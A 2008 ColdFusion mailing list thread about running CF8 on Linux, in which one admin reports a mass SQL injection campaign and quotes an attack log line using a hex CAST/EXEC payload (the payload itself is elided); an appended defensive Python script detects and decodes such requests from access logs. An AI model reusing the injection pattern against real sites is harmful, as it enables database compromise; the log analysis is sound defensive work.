I actually reported on this in my ColdFusion in the news column in FA
online. Hacker Webzine ran an article detailing SQL injection attack
exploits against ColdFusion sites, and since then, we have come up on
the radar as prime targets.

http://www.fusionauthority.com/news/4761-coldfusion-in-the-news-july-20-30-2008.htm

It's under the heading "Hack Attack" in the column. Basically, this
kind of script-kiddie attack against CF sites has been mushrooming in
the last two or three weeks.

Judith

On Thu, Aug 7, 2008 at 6:34 PM, Cary Gordon <[EMAIL PROTECTED]> wrote:
> It is a centrally controlled attack running on zombie computers. I am
> pretty sure that this is related to the recent spate of hijacking and
> DNS issues. You are not the lone ranger.
>
> Cary Gordon
> The Cherry Hill Company
> http://chillco.com
>
>
> On Aug 7, 2008, at 3:23 PM, Terry Ford wrote:
>
>> Thanks for the update.  We've been running CF8 for a few months now
>> with no problems.   Approximately 1.5M CF pages a day on a single
>> server.  The server is barely breaking a sweat too... I suspect we
>> could probably do 50% more traffic on this machine without major
>> performance issues.   We use lots of caching.
>>
>> 178 days now without a reboot.  Haven't had a single crash since we
>> switched to CF8. Needless to say, very impressed!
>>
>> Totally unrelated:   has anyone seen massive SQL injection attacks
>> over the last few days / weeks?   We're getting tens of thousands of
>> injection attacks from hundreds of different IPs each day.  It
>> started off slow, but now they're coming in like mad.   It has
>> almost become a DOS attack now over the past 24 hrs.
>>
>> The injection attacks don't worry me -- we're well coded against
>> them (and these seem to be MSSQL attacks).   But the sheer volume of
>> traffic being generated is starting to get a little worrisome.
>> Does anyone know more about where this attack is coming from?   Is
>> it a centrally controlled attack, a worm, ...?
>>
>>
>> Here is a typical attack:
>>
>> 70.156.129.101 - - [07/Aug/2008:17:12:33 -0500] "GET /path/template.cfm?gid=1074';[EMAIL PROTECTED](4000);SET%20@S=CAST
>> (0x[...]
>> %20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
>>
>>
>> Regards
>> Terry
>>
>>
>> --- On Fri, 8/1/08, Wil Genovese <[EMAIL PROTECTED]> wrote:
>>
>>> From: Wil Genovese <[EMAIL PROTECTED]>
>>> Subject: Re: CF8 on linux -- who's running it on large sites?
>>> To: "CF-Linux" <[email protected]>
>>> Date: Friday, August 1, 2008, 6:14 PM
>>>> Hey folks,
>>>>
>>>> Looks like this list is pretty quiet nowadays.
>>>>
>>>> We're about ready to upgrade to CF8 from CF6.1, mainly for the
>>>> performance improvements.
>>>>
>>>> We never upgraded from CF6.1 to 7 because 6.1 frankly runs just great
>>>> and we use a pretty small and optimized set of features, but the juicy
>>>> performance metrics of 8 look to be well worth it.
>>>>
>>>> I'm just curious as to how many of you larger linux implementations
>>>> are running CFMX 8 right now, and what your experience has been
>>>> stability-wise, and whether you ran into any compatibility or
>>>> connector issues.
>>>>
>>>> Regards
>>>> Terry
>>>
>>> I just thought I would post an update on this since people
>>> are wondering about high traffic sites.  We just launched
>>> the first of five CF 8.0.1 64bit servers on Linux RH 5.xx.
>>>
>>> So far the installs we've done (in house and
>>> production) have not had any major issues.  We've only
>>> needed to install our custom cfx or jars and tune the
>>> JVMs.
>>>
>>> This week we launched a production server and with a few
>>> minor JVM tuning tweaks we've got it running pretty
>>> good.  This weekend and Monday will tell us more.  So far
>>> it's handling about a third of our total website service
>>> traffic. We run three CF servers behind a load balancer to
>>> handle all the http://www.mlsfinder.com traffic.  These
>>> three servers see about 2.3 million CF Page views per day
>>> (as of July 1st, 2008) and the load is spread at 33% each.
>>>
>>> If this weekend and Monday (our servers' busiest day)
>>> turn out well we'll be upgrading the remaining servers
>>> next week.
>>>
>>> So far our cf7 code (which is really cf4 and cf5 code that
>>> was tweaked enough to run on CF7) runs just fine and even
>>> faster than on cf7. Turds really can fly with CF8.  :-O
>>> (yeah the code base is old and we are starting a new code
>>> base which is CFMX OOMVC, but it all takes time and money.)
>>>
>>> Since we're upgrading from CF7.01 ENT 32bit to CF8.0.1
>>> 64Bit our upgrade process is as follows: make a disk image
>>> (in case all goes bad), wipe the server clean and install RH
>>> 5 64bit, then install CF8.0.1 64 bit.  Then apply all the
>>> config settings.
>>>
>>>
>>> Wil Genovese
>>> Wolfnet Technologies, LLC
>>>
>>>
>>
>>
>
> 
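
Terry's questions about volume and source can be answered from the access log itself. The following is an added example, not code from anyone in this thread: it scans combined-format log lines for the request shape he posted (a hex literal passed through CAST and then EXEC), decodes the hex for triage, and counts hits per source IP and per targeted parameter. The sample lines, IP addresses and hex value are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"\S+ (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Request shape seen in the thread: a hex literal CAST to a character type,
# then executed through EXEC(@variable).
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)
EXEC_VAR = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I)

def classify(line):
    """Return (ip, endpoint, parameter, decoded_sql) for a hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        value = unquote(value.replace("+", " "))
        cast = CAST_HEX.search(value)
        if cast and EXEC_VAR.search(value):
            digits = cast.group(1)
            digits = digits[:len(digits) // 2 * 2]  # tolerate a truncated line
            return m["ip"], path, name, bytes.fromhex(digits).decode("latin-1")
    return None

def summarize(lines):
    """Count hits per source IP and per (endpoint, parameter)."""
    by_ip, by_param, payloads = Counter(), Counter(), set()
    for line in lines:
        hit = classify(line)
        if hit:
            ip, path, name, sql = hit
            by_ip[ip] += 1
            by_param[(path, name)] += 1
            payloads.add(sql)
    return by_ip, by_param, payloads

# Constructed sample lines (documentation IPs; the hex decodes to "SELECT 1").
SAMPLE = """\
192.0.2.10 - - [07/Aug/2008:17:12:33 -0500] "GET /path/template.cfm?gid=1074';SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 36 "-" "Mozilla/4.0"
198.51.100.7 - - [07/Aug/2008:17:12:40 -0500] "GET /path/template.cfm?page=2&gid=9;set+@s=cast(0x53454C4543542031+as+varchar(4000));exec(@s); HTTP/1.1" 200 36 "-" "Mozilla/4.0"
192.0.2.10 - - [07/Aug/2008:17:13:02 -0500] "GET /path/template.cfm?gid=1074 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
""".splitlines()

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

The per-parameter count shows which inputs are being probed, and the set of distinct decoded payloads shows whether the many source IPs are sending one shared statement.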

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4422